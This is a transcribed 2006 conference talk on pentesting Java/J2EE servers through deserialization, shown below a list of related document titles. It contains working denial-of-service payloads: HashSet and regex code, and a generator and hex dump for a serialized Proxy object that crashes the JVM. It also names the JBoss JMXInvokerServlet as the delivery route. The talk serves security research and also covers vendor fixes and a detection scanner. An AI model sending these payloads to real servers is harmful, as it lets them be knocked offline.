Pentesting Java/J2EE, finding remote holes

Similar documents
Pentesting J2EE. January 25, Marc Schönefeld University of Bamberg

Adobe Systems Incorporated

Oracle WebLogic Foundation of Oracle Fusion Middleware. Lawrence Manickam Toyork Systems Inc

What is Web Security? Motivation

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Magento Security and Vulnerabilities. Roman Stepanov

Java Web Application Security

Application Code Development Standards

90% of data breaches are caused by software vulnerabilities.

Lecture 7: Class design for security

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Software Vulnerabilities in Java

OWASP Top Ten Tools and Tactics

Passing PCI Compliance How to Address the Application Security Mandates

Tuning WebSphere Application Server ND 7.0. Royal Cyber Inc.

Web Application Security

JAVA 2 Network Security

ARM-BASED PERFORMANCE MONITORING FOR THE ECLIPSE PLATFORM

Blackboard Learn TM, Release 9 Technology Architecture. John Fontaine

The Sun Certified Associate for the Java Platform, Standard Edition, Exam Version 1.0

INTRODUCTION TO JAVA PROGRAMMING LANGUAGE

SW5706 Application deployment problems

Development Processes (Lecture outline)

Web Application Report

Mobile Application Languages XML, Java, J2ME and JavaCard Lesson 04 Java

Web Application Vulnerability Testing with Nessus

Top Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia

Web application testing

FINAL DoIT v.8 APPLICATION SECURITY PROCEDURE

Introduction to Web Application Security. Microsoft CSO Roundtable Houston, TX. September 13 th, 2006

WebSphere Server Administration Course

IBM WebSphere Server Administration

Security Testing and Vulnerability Management Process. e-governance

Columbia University Web Security Standards and Practices. Objective and Scope

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

A Java-based system support for distributed applications on the Internet

DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES

Web Engineering Web Application Security Issues

Security features of ZK Framework

CMSC 421, Operating Systems. Fall Security. URL: Dr. Kalpakis

Security Code Review- Identifying Web Vulnerabilities

Programming Flaws and How to Fix Them

Java and Java Virtual Machine Security

labs Attacking JAVA Serialized Communication By: Manish S. Saindane

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Hacking (and securing) JBoss AS

An Introduction to Application Security in J2EE Environments

elearning for Secure Application Development

Attack Vector Detail Report Atlassian

TOOL EVALUATION REPORT: FORTIFY

Thick Client Application Security

Source Code Security Analysis Tool Functional Specification Version 1.0

Web Application Penetration Testing

Vulnerability Assessment and Penetration Testing

GlassFish v3. Building an ex tensible modular Java EE application server. Jerome Dochez and Ludovic Champenois Sun Microsystems, Inc.

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

Threat Modeling. Frank Piessens ) KATHOLIEKE UNIVERSITEIT LEUVEN

Web App Security Audit Services

Cloud Security:Threats & Mitgations

Using Nessus In Web Application Vulnerability Assessments

Web application security

ETHICAL HACKING APPLICATIO WIRELESS110 00NETWORK APPLICATION MOBILE MOBILE0001

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus

AVRO - SERIALIZATION

02 B The Java Virtual Machine

BPM Scheduling with Job Scheduler

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

North Dakota 2013 IT Security Audit Vulnerability Assessment & Penetration Test Project Briefing

Chapter 1 Web Application (In)security 1

Put a Firewall in Your JVM Securing Java Applications!

A technical guide for monitoring Adobe LiveCycle ES deployments

SSA : Multiple Vulnerabilities in WinCC flexible and WinCC V11 (TIA Portal)

Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group

Web Application Security

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Jonathan Worthington Scarborough Linux User Group

Habanero Extreme Scale Software Research Project

WHITEPAPER. Nessus Exploit Integration

Virtualization System Security

CHAPTER 1 - JAVA EE OVERVIEW FOR ADMINISTRATORS

Clustering with Tomcat. Introduction. O'Reilly Network: Clustering with Tomcat. by Shyam Kumar Doddavula 07/17/2002

Strategic Information Security. Attacking and Defending Web Services

Tomcat 5 New Features

WebSphere v5 Administration, Network Deployment Edition

How to Build a Trusted Application. John Dickson, CISSP

Ethical Hacking as a Professional Penetration Testing Technique

Software Security Touchpoint: Architectural Risk Analysis

Java Interview Questions and Answers

Barracuda Web Site Firewall Ensures PCI DSS Compliance

The Advantages of Block-Based Protocol Analysis for Security Testing

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology

CrashPlan Security SECURITY CONTEXT TECHNOLOGY

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Japan Communication India Skill Development Center

ensuring security the way how we do it

What s Cool in the SAP JVM (CON3243)

Transcription:

Pentesting Java/J2EE, finding remote holes Marc Schoenefeld University of Bamberg HackInTheBox 2006 Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 1 / 42

Agenda 1 Context 2 OWASP Attack Patterns also apply to J2EE 3 Serialization in J2EE 4 Exploiting java.lang.reflect.proxy 4 Attack construction 5 Conclusion Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 2 / 42

Context J2EE (Java 2 Enterprise Edition) is a specification by Sun Microsystems(Shannon 2003) that is build on top of the J2SE (Java 2 Standard Edition). It provides a standardized set of services needed to produce business applications in a large-scale environment. A typical J2EE business application is distributed among a set of java virtual machines into tiers using common communication protocols HTTP RMI, RMI/IIOP JMS JDBC Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 3 / 42

Distribution of objects Distribution of objects in a J2EE environment Client Tier Web Tier Enterprise Tier Backend Tier JNLP-Client J D B C Database JVM Browser-Client H T T P Servlet- Engine JVM R M I EJBs JVM Standalone-Client J N D I Naming service JVM J 2 C Enterprise resource JVM Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 4 / 42

Pentesting and the J2EE security model The J2EE specification is of no great help when it comes to security. It defines a set of abstract security requirements: Authentication Access control for ressources Data integrity Confidentiality Non-Repudiation Auditing But the specification gives no hint to achieve this, such as how to map J2EE security requirements to J2SE security APIs. So the developer is left alone how to implement these requirements. Security goal in the J2EE spec: the unaware programmer Transparency: Application Component Providers should not have to know anything about security to write an application(shannon 2003). Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 5 / 42

Pentesting and the J2EE security model This violates current secure development process initiatives such as those by McGraw (2006) and Howard & Lipner (2006) to early involve the programmer in security actions such as Training Define Security Test Cases Perform their own pentests Security goal in modern SDLCs: the aware programmer Security Training Risk analysis Developer pentest Static analysis PreProd pentest Risk analysis Prod. PT RA Requirements Abuse Security Review Cases testcases Requirements Design Code Test Deployment Production Feedback Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 6 / 42

J2EE Pentesting Steps Threat Model J2EE is more than JPSs serving HTML J2EE is mainly invoking methods on remote object over multiple transport protocols (RMI, JMS, HTTP) Checking only OWASP for HTTP jumps to short Information Gathering (Active and Passive) Details about Application Server, JDK level Classes in Classpath (Every class loaded adds to attack surface) Configuration settings (Applications deployed, connectors,... ) Communication channels (Ports, Classes that are listening) Exploiting Construct Attack Packets Fuzzing or Manually Hardening Protect Ports Restrict Servlets Only allow current Cryptography Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 7 / 42

Attack Patterns OWASP Top 10 (The Open Web Application Security Project 2004) A1 Unvalidated Parameters A2 Broken Access Control A3 Broken Account and Session Management A4 Cross-Site Scripting (XSS) Flaws) A5 Buffer Overflows A6 Command Injection Flaws A7 Error Handling Problems A8 Insecure Use of Cryptography A9 Remote Administration Flaws A10 Web and Application Server Misconfiguration Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 8 / 42

J2EE is more than just serving HTTP to client HTTP,RMI, RMI/IIOP and JMS are different transports but all share the semantics of the Serialization API (Greanier 2000): The sender sends the object by marshalling it into a byte array The buffer is sent over a socket or stored otherwise (file, JNDI,... ) The receiver demarshalls the byte array back to an object. Serialisation in J2EE propagates objects Client Tier Web Tier Application Tier Client JVM 1. Sender-JVM Marshalls Object to Bytes H T T P 2. Send Bytes in POST request (or RMI/JMS etc.) Servlet- Engine JVM 3. Receiver-JVM demarshalls Bytes into Object R M I J N D I 4. Object may propagate EJBs JVM Naming service JVM Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 9 / 42

Java Serialization Sending objects via Serialisation API open an attack opportunity to harm the availability and integrity of J2EE applications (OWASP 1). Security implications with serialization 1 Confidentiality: Java visibility rules can be subverted by manipulating private members in its serialized form by transferring an object containing private data to its serial form, observing or manipulating the bytes forming the private field and transfer the byte buffer back into an object (described by Bloch (2001)) 2 Integrity and Availability:The control flow of the JVM on the receiving side can be forced to branch into dangerous or vulnerable code blocks which may impact the stability of the receiving process (we will focus on this!) Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 10 / 42

Code to receive an object from a socket Receive an object from an open socket class ReceiveRequest extends Thread{ Socket clientsocket = null ; ObjectInputStream ois = null; public ReceiveRequest (Socket clisock) throws Exception { ois = new ObjectInputStream( clisock.getinputstream() ); } public void run() { try { Request ac = (Request) ois.readobject(); } catch (Exception e) { System.out.println(e) ; } //... } } The readobject statement seems to be atomic, but... Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 12 / 42

Bytecode representation Bytecode in run() method public void run(); 0: aload_0 1: getfield #3; //Field ois:ljava/io/objectinputstream; 4: invokevirtual #7; //Method ObjectInputStream.readObject:()Ljava/ 7: checkcast #8; //class cast to objecttype Request (#8) 10: astore_1 11: goto 22 14: astore_1 Deconstructing the readobject instruction into bytecode shows two steps: location #4 invokes ObjectInputStream.readObject(), which leaves the untyped object on the stack in location #7 the object is casted to the expected type. Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 14 / 42

Attack strategy State transition during deserialization t = 0 attack client sends byte stream (serialized object data) to an ObjectInputStream on the server t = 1 Server branches into readobject method of the class according to the client payload (serialversionuid) t = 2 server casts object to the needed type A) cast is valid: continue work B) cast is invalid: throw ClassCastException Control flow manipulation possible Deserialization lacks type information which type is expected by the application. Attacker has opportunity to influence the control flow of the JVM to branch into an readobject method of a class of his choice. Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 15 / 42

Detection of vulnerable classes With knowledge which readobject implementations in a given classpath are vulnerable the attacker may 1 first generate a list of all readobject methods in the classpath, 2 then iterate through the list and search for vulnerable code patterns. Technically this can be achieved with standalone bytecode detectors coded with BCEL (Dahm 2001) or ASM (E. Bruneton & Coupaye 2002). Detectors can also be integrated into a comfortable analysis framework like findbugs(hovemeyer & Pugh 2004). We identified that the readobject methods of these classes are harmful for the stability of JVMs using the serialization API (like J2EE servers): Identified vulnerable classes java.util.regex.pattern java.awt.font.icc Profile java.util.hashset java.lang.reflect.proxy... Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 16 / 42

Scanning the attack surface A bytecode scanner to find serializable classes with non-default readobject methods Iterate over the opcodes in readobject methods public void sawopcode(int seen) { switch (seen) { case INVOKESTATIC: case INVOKESPECIAL: String classname = getdottedclassconstantoperand(); // boolean criteria = false; if (!classname.startswith("[")) { JavaClass clazz = Repository.lookupClass(className); Method[] methods = clazz.getmethods(); for (int i = 0; i < methods.length; i++) { criteria = checkmethod(methods[i]); } } if (criteria) { BugInstance bi = new BugInstance(this, "RO_DANGEROUS_READOBJECT", HIGH_PRIORITY).addClassAndMethod(this); bugreporter.reportbug(bi); System.out.println("reported"); } Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 18 / 42

Exploiting and refactoring java.util.regex.pattern A Pattern is a compiled representation of a regular expression. Test program showing regex pattern compilation timing import java.util.regex.*; public class RegexPatternTimingTest { public static void main (String[] a) { String reg = "$"; for (byte i = 0; i < 100; i++) { reg = new String(new byte[]{ (,(byte)((i % 26) +65), ),? })+reg; long t = System.currentTimeMillis(); Pattern p = Pattern.compile(reg.toString()); long u = System.currentTimeMillis()-t; System.out.println(i+1+":"+u+":"+reg); } } } The program generates strings (A)?$ (1 group), (B)?(A)?$ (2 groups) and so on to evaluate the timing behavior of generating a Pattern object with multiple groups. The results show an exponential growth of compilation time of the pattern object. Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 20 / 42

Timing behavior JVM timing behavior to construct regex objects With the knowledge of this timing behaviour the attacker is able keep a java process busy and becoming unresponsive(sun Microsystems 2004). Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 22 / 42

Implementation problem The Pattern class implements the Serializable interface so an instance of this class can be sent instead of any other serializable class the victim might expect. The Pattern.readObject() method in JDK 1.4.2 05 was implemented to immediately compile the Pattern after reading its stringified form from an ObjectInputStream. readobject method in regex pattern for JDK 1.4.2 05 /** * Recompile the Pattern instance from a stream. * The original pattern string is read in and the object * tree is recompiled from it. */ private void readobject(java.io.objectinputstream s) throws java.io.ioexception, ClassNotFoundException { // Read in all fields s.defaultreadobject(); // Initialize counts groupcount = 1; localcount = 0; // Recompile object tree if (pattern.length() > 0) compile(); else root = new Start(lastAccept); } Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 24 / 42

Refactoring of Pattern class in JDK 1.4.2 06 private void readobject(java.io.objectinputstream s) throws java.io.ioexception, ClassNotFoundException { // Read in all fields s.defaultreadobject(); // Initialize counts groupcount = 1; localcount = 0; // if length > 0, the Pattern is lazily compiled compiled = false; if (pattern.length() == 0) { root = new Start(lastAccept); matchroot = lastaccept; compiled = true; } } Sun patched the vulnerable readobject method in JDK 1.4.2 06 by introducing a flag allowing lazy compilation at time of first usage - The timing behavior itself is unchanged - API can be still misused Pattern.compile() + But at least they patched the OWASP 1 issue, and harmful remote input does not impact the stability during JVM serialisation Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 26 / 42

Exploiting and Refactoring of java.util.hashset A serialized instance of the java.util.hashset class can be used to trigger an OutOfMemoryError in a receiving JVM. The approach adapts the results of a common attack pattern based on Hashtable collisions described by (Crosby & Wallach 2003) as generic attack on APIs in programming languages An instance of java.util.hashset stores its data in an embedded HashMap object that is initialized with an initial capacity (default 16) and a load factor (default 0.75). In our serialized instance we changed the initial capacity to 1 and the initial load factor to 0.000000000001. We then added 13 differing objects of java.lang.byte objects to the java.util.hashset. Finally the HashSet is exported to a byte array, which can be stored on a disk or sent over a socket. Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 29 / 42

Never trust a HashSet with only 13 Bytes HashSet hs = new HashSet(1,0.000000000001f); int count=0; while (count < 13) { Object o = new Byte((byte)count ); hs.add(o); count++; } ByteArrayOutputStream bos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(bos); oos.writeobject(hs); oos.flush(); bos.flush(); The receiving JVM runs into an OutOfMemoryError which is all you see in the server log. In addition to the caused shortage of Heap memory, programs that do not explicitly catch errors in addition to exceptions may additionally fail due to this unexpected error condition. This vulnerability still exists in current JVM version to the time of writing. Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 31 / 42

Exploiting java.lang.reflect.proxy The class java.lang.reflect.proxy is essential for reflective programming. It allows deferring of the invocation to a proxy object instead of the actual receiver of the invocation messages to allow better decoupling of services. java.lang.reflect.proxy.defineclass0 private static native Class defineclass0(classloader loader, String name, byte[] b, int off, int len); A DoS-vulnerability (OWASP 9) exists in the native code of the Proxy.defineClass0 method when called with more than 65535 non-public interfaces (java.awt.conditional) it crashes the JVM. Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 32 / 42

We exploited the vulnerability by handcrafting a serialized representation of this class Consisting of 65536 non-public interface references. Serialized java.lang.reflect.proxy object, able to crash the JVM 0000000: aced0005 767d0000 fffa0014 6a617661...v}...java 0000010: 2e617774 2e436f6e 64697469 6f6e616c.awt.Conditional 0000020: 00146a61 76612e61 77742e43 6f6e6469..java.awt.Condi 0000030: 74696f6e 616c0014 6a617661 2e617774 tional..java.awt 0000040: 2e436f6e 64697469 6f6e616c 00146a61.Conditional..ja 0000050: 76612e61 77742e43 6f6e6469 74696f6e va.awt.condition 0000060: 616c0014 6a617661 2e617774 2e436f6e al..java.awt.con [...] 015ffe0: 6a617661 2e617774 2e436f6e 64697469 java.awt.conditi 015fff0: 6f6e616c 00146a61 76612e61 77742e43 onal..java.awt.c 0160000: 6f6e6469 74696f6e 616c7872 00176a61 onditionalxr..ja 0160010: 76612e6c 616e672e 7265666c 6563742e va.lang.reflect. 0160020: 50726f78 79e127da 20cc1043 cb020001 Proxy....C... 0160030: 4c000168 7400254c 6a617661 2f6c616e L..ht.%Ljava/lan 0160040: 672f7265 666c6563 742f496e 766f6361 g/reflect/invoca 0160050: 74696f6e 48616e64 6c65723b 7870 tionhandler;xp Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 34 / 42

Main fuzzing routine to generate harmful java.lang.reflect.proxy private static void writeartifiallyproxy(int len) throws Exception { DataOutputStream dos = new DataOutputStream( new FileOutputStream("art" + len)); WriteToDataOutputStream(dos, new int[] { 0xac, 0xed, 0x00, 0x05, 0x76, 0x7d }); //Prefix dos.writeint(len); for (int i = 0; i < len; i++) { dos.writeutf("java.awt.conditional"); } // itfname WriteToDataOutputStream(dos, new int[] { 0x78, 0x72 }); dos.writeutf("java.lang.reflect.proxy"); //name of this class WriteToDataOutputStream(dos, new int[] { 0xe1, 0x27, 0xda, 0x20, 0xcc, 0x10, 0x43, 0xcb, 0x02, 0x00, 0x01, 0x4c }); dos.writeutf("h"); // type indicator WriteToDataOutputStream(dos, new int[] { 0x74}); dos.writeutf("ljava/lang/reflect/invocationhandler;"); WriteToDataOutputStream(dos, new int[] { 0x78, 0x70 }); dos.close(); } Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 35 / 42

Refactoring Release 1.5.0 06 was the first JDK version that was not vulnerable to this malicious payload. Sun refactored the vulnerable code by adding a check for the number of referenced interfaces. Serialized java.lang.reflect.proxy object, able to crash the JVM public static Class<?> getproxyclass(classloader loader, Class<?>... interfaces) throws IllegalArgumentException { if (interfaces.length > 65535) { throw new IllegalArgumentException("interface limit exceeded"); } In that case, an IllegalArgumentException is thrown with interface limit exceeded as informational text. Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 37 / 42

Construction of an attack on a J2EE server How do these low-level JDK vulnerabilities impact J2EE? An attacker needs to find out how the serialized objects are accepted by the server. We demonstrate the described penetration strategy by using a feature of the JBoss J2EE server. JBoss allows to trigger internal JMX (Java Management Extensions) actions via a HTTP POST request to the URL /JMXInvokerServlet URL, where a servlet expects an InvocationRequest in a serialized form. Attacker sends a manipulated object like java.lang.reflect.proxy to crash the J2EE server Most of J2EE protocols (RMI, RMI/IIOP, JNDI, etc. ) rely on serialization and can be penetrated in a similar fashion. Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 39 / 42

Propagation of attack values AttackerCallsServlet call Servlet getmeanobject getobjectfrompostdata read serialized Object ObjectInputStream. readobject Create remote Object Port 8080: HTTPInvoker Servlet mapping: JMXInvokerServlet readobject ObjectInputStream HTTP Adapter JMX JBoss(J2EE) J2SE call Objects readobject method look up SerialVersionUID unmarshall parameters branch into other code vulnerable class other.dll JVM.DLL OS RT.JAR C Crash/ Excessive CPU usage Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 40 / 42

Conclusion We have shown that OWASP not only affects J2EE pentesting by handling the ordinary HTTP misuse cases. System near APIs (like Serialisation) are also affected Implementation bugs deep in the JDK exists that are reachable via user input in J2EE applications. This falls into the category #1 of the OWASP catalogue called unvalidated input. We have seen these vulnerabilities not only in Sun JDK, but also in the IBM JDK and Mac JDK As J2EE inherits the bugs from the underlying JDK, therefore this an example for a layer-below attack (Gollmann 1999). A policy driven approach may be helpful to reduce the attack surface by restricting the serialization features of a JDK when used in exposed scenario such as J2EE (for example a banking application is not required to receive serialized Font objects). Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 41 / 42

finally{} This is the end, beautiful friend Thanks for listening Time to ask questions (after demo) You may like to send me an email Marc -at- ILLEGALACCESS DOT ORG Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 42 / 42

Bloch, J. (2001), Effective Java Programming Language Guide, Addison-Wesley Professional. Crosby, S. A. & Wallach, D. S. (2003), Denial of Service via Algorithmic Complexity Attacks, in Usenix, Department of Computer Science, Rice University. Dahm, M. (2001), Byte Code Engineering with the BCEL API. URL: http://citeseer.ist.psu.edu/dahm01byte.html E. Bruneton, R. L. & Coupaye, T. (2002), Asm: a code manipulation tool to implement adaptable systems. URL: http://asm.objectweb.org/current/asm-eng.pdf Gollmann, D. (1999), Computer Security, Wiley & Sons. Greanier, T. (2000), Discover the secrets of the Java Serialization API, JavaWorld. URL: http://java.sun.com/developer/technicalarticles/programming/serializatio Hovemeyer, D. & Pugh, W. (2004), Finding Bugs is Easy, in OOPSLA. URL: http://findbugs.sourceforge.net/docs/oopsla2004.pdf Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 42 / 42

Howard, M. & Lipner, S. (2006), The Security Development Lifecycle, Microsoft Press. McGraw, G. (2006), Software Security- Building Security In, Addison-Wesley. Shannon, B. (2003), Java TM 2 Platform Enterprise Edition Specification, v1.4. URL: http://java.sun.com/j2ee/j2ee-1 4-fr-spec.pdf Sun Microsystems (2004), Java Runtime Environment Remote Denial-of-Service (DoS) Vulnerability. URL: http://classic.sunsolve.sun.com/pubcgi/retrieve.pl?doc=fsalert/57707 The Open Web Application Security Project (2004), OWASP Top Ten Most Critical Web Application Security Vulnerabilities. URL: http://www.owasp.org/documentation/topten.html Marc Schoenefeld (Uni Bamberg) Pentest J2EE, remote holes HackInTheBox 2006 42 / 42

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information